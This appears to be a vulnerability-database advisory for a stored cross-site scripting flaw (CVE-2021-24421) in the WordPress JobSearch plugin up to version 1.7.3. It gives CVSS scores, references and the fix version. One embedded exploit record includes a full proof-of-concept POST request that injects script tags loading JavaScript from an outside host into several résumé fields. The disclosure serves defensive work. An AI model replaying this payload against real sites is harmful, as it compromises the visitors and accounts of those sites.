Description
Authenticated Persistent Cross-Site Scripting (XSS) vulnerability discovered by m0ze in WordPress JobSearch premium plugin (versions <= 1.7.3).
## Solution
Update the WordPress JobSearch premium plugin to the latest available version (at least 1.7.4).
Affected Software
Related
{"id": "PATCHSTACK:3A162410AFA346C25FF9ACAB0488D969", "vendorId": null, "type": "patchstack", "bulletinFamily": "software", "title": "WordPress JobSearch premium plugin <= 1.7.3 - Authenticated Persistent Cross-Site Scripting (XSS) vulnerability", "description": "Authenticated Persistent Cross-Site Scripting (XSS) vulnerability discovered by m0ze in WordPress JobSearch premium plugin (versions <= 1.7.3).\n\n## Solution\n\n\r\n Update the WordPress JobSearch premium plugin to the latest available version (at least 1.7.4).\r\n ", "published": "2021-05-19T00:00:00", "modified": "2021-05-19T00:00:00", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 3.5}, "severity": "LOW", "exploitabilityScore": 6.8, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, "href": "https://patchstack.com/database/vulnerability/wp-jobsearch/wordpress-jobsearch-premium-plugin-1-7-3-authenticated-persistent-cross-site-scripting-xss-vulnerability", "reporter": "m0ze (Patchstack Red Team)", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24421", "https://m0ze.ru/vulnerability/[2021-05-19]-[WordPress]-[CWE-79]-WP-JobSearch-WordPress-Plugin-v1.7.3.txt", "https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856"], "cvelist": ["CVE-2021-24421"], "immutableFields": [], "lastseen": "2022-06-01T19:32:15", "viewCount": 1, "enchantments": {"score": {"value": 2.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24421"]}, {"type": "wpexploit", "idList": ["WPEX-ID:B378D36D-66D9-4373-A628-E379E4766375"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:B378D36D-66D9-4373-A628-E379E4766375"]}]}, "affected_software": {"major_version": [{"name": "jobsearch", "version": 1}]}, "epss": [{"cve": "CVE-2021-24421", "epss": "0.000580000", "percentile": "0.224390000", "modified": "2023-03-19"}], "vulnersScore": 2.0}, "_state": {"score": 1660007784, "dependencies": 1660004461, "affected_software_major_version": 1666695388, "epss": 1679290575}, "_internal": {"score_hash": "60ff903b926bd2559bf1b4acd0e3d34e"}, "affectedSoftware": [{"version": "1.7.3", "operator": "le", "name": "jobsearch"}], "vendor_cvss": {"score": "3.1", "severity": "Medium severity"}, "owasp": "A7: Cross-Site Scripting (XSS)", "classification": "Cross Site Scripting (XSS)"}
{"cve": [{"lastseen": "2023-02-09T14:11:21", "description": "The WP JobSearch WordPress plugin before 1.7.4 did not sanitise or escape multiple of its parameters from the my-resume page before outputting them in the page, allowing low privilege users to use JavaScript payloads in them and leading to a Stored Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-12T20:15:00", "type": "cve", "title": "CVE-2021-24421", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24421"], "modified": "2021-07-15T14:55:00", "cpe": [], "id": "CVE-2021-24421", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24421", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": []}], "wpexploit": [{"lastseen": "2021-09-14T23:11:33", "description": "The plugin did not sanitise or escape multiple of its parameters from the my-resume page before outputting them in the page, allowing low privilege users to use JavaScript payloads in them and leading to a Stored Cross-Site Scripting issue\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-06-16T00:00:00", "type": "wpexploit", "title": "WP JobSearch < 1.7.4 - Authenticated Stored XSS", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24421"], "modified": "2021-06-29T14:12:50", "id": "WPEX-ID:B378D36D-66D9-4373-A628-E379E4766375", "href": "", "sourceData": "Vulnerable parameter(s): &jobsearch_field_education_title[]=, &jobsearch_field_education_academy[]=, &jobsearch_field_experience_company[]=, &jobsearch_field_portfolio_title[]=, &jobsearch_field_portfolio_vurl[]=, &jobsearch_field_portfolio_url[]=, &jobsearch_field_skill_title[]=, &jobsearch_field_lang_title[]=.\r\n\r\nPoC | Authenticated Persistent XSS | Candidate Profile:\r\n\r\nPOST /plugins/jobsearch/user-dashboard/?tab=my-resume HTTP/2\r\nCookie: [user cookies]\r\nUser-Agent: Mozilla/5.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1612\r\n\r\njobsearch_field_resume_cover_letter=PoC&candidate_cover_file=&get_cand_skills%5B%5D=1553&jobsearch_field_education_title%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_education_start_date%5B%5D=May+29%2C+2021&jobsearch_field_education_end_date%5B%5D=&jobsearch_field_education_date_prsnt%5B%5D=on&jobsearch_field_education_academy%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_education_description%5B%5D=PoC&jobsearch_field_experience_title%5B%5D=1553&jobsearch_field_experience_start_date%5B%5D=May+29%2C+2021&jobsearch_field_experience_end_date%5B%5D=June+29%2C+2021&jobsearch_field_experience_date_prsnt%5B%5D=on&jobsearch_field_experience_company%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_experience_description%5B%5D=PoC&add_portfolio_img=&jobsearch_field_portfolio_title%5B%5D=\"><script+src%3d//m0ze.ru/payload/a.js></script><div%20&add_portfolio_img=&jobsearch_field_portfolio_image%5B%5D=921218418&jobsearch_field_portfolio_vurl%5B%5D=\"><script+src%3d//m0ze.ru/payload/a.js></script><div%20&jobsearch_field_portfolio_url%5B%5D=\"><script+src%3d//m0ze.ru/payload/a.js></script><div%20&jobsearch_field_skill_title%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_skill_percentage%5B%5D=88&jobsearch_field_lang_title%5B%5D=<script+src%3d//m0ze.ru/payload/a.js></script>&jobsearch_field_lang_level%5B%5D=proficient&jobsearch_field_lang_percentage%5B%5D=88&jobsearch_field_award_title%5B%5D=1553&jobsearch_field_award_year%5B%5D=2021&jobsearch_field_award_description%5B%5D=PoC&user_resume_form=1&terms_cond_check=on\r\n\r\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-09-14T23:11:33", "description": "The plugin did not sanitise or escape multiple of its parameters from the my-resume page before outputting them in the page, allowing low privilege users to use JavaScript payloads in them and leading to a Stored Cross-Site Scripting issue\n\n### PoC\n\nVulnerable parameter(s): &jobsearch;_field_education_title[]=, &jobsearch;_field_education_academy[]=, &jobsearch;_field_experience_company[]=, &jobsearch;_field_portfolio_title[]=, &jobsearch;_field_portfolio_vurl[]=, &jobsearch;_field_portfolio_url[]=, &jobsearch;_field_skill_title[]=, &jobsearch;_field_lang_title[]=. PoC | Authenticated Persistent XSS | Candidate Profile: POST /plugins/jobsearch/user-dashboard/?tab=my-resume HTTP/2 Cookie: [user cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 1612 jobsearch_field_resume_cover_letter=PoC&candidate;_cover_file=&get;_cand_skills%5B%5D=1553&jobsearch;_field_education_title%5B%5D=", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-06-16T00:00:00", "type": "wpvulndb", "title": "WP JobSearch < 1.7.4 - Authenticated Stored XSS", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24421"], "modified": "2021-06-29T14:12:50", "id": "WPVDB-ID:B378D36D-66D9-4373-A628-E379E4766375", "href": "https://wpscan.com/vulnerability/b378d36d-66d9-4373-a628-e379e4766375", "sourceData": "", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "cnvd": [{"lastseen": "2022-11-05T10:44:50", "description": "WordPress is the Wordpress Foundation's set of blogging platforms developed using the PHP language. The platform supports the hosting of personal blogging sites on PHP and MySQL servers. WordPress plugin is a WordPress open source application plugin. a security vulnerability in versions prior to WP JobSearch WordPress plugin 1.7.4 stems from the plugin's failure to clean up or escape its multiple parameters from the \"\"my- resume\" page before exporting data to the page or escaping its multiple parameters, allowing a low-privileged user to use the JavaScript load in it and causing a cross-site scripting issue to be stored. No details of the vulnerability are currently available.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-14T00:00:00", "type": "cnvd", "title": "WordPress plugin has an unspecified vulnerability (CNVD-2021-59597)", "bulletinFamily": "cnvd", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24421"], "modified": "2021-08-09T00:00:00", "id": "CNVD-2021-59597", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-59597", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}]}
WordPress JobSearch premium plugin <= 1.7.3 - Authenticated Persistent Cross-Site Scripting (XSS) vulnerability
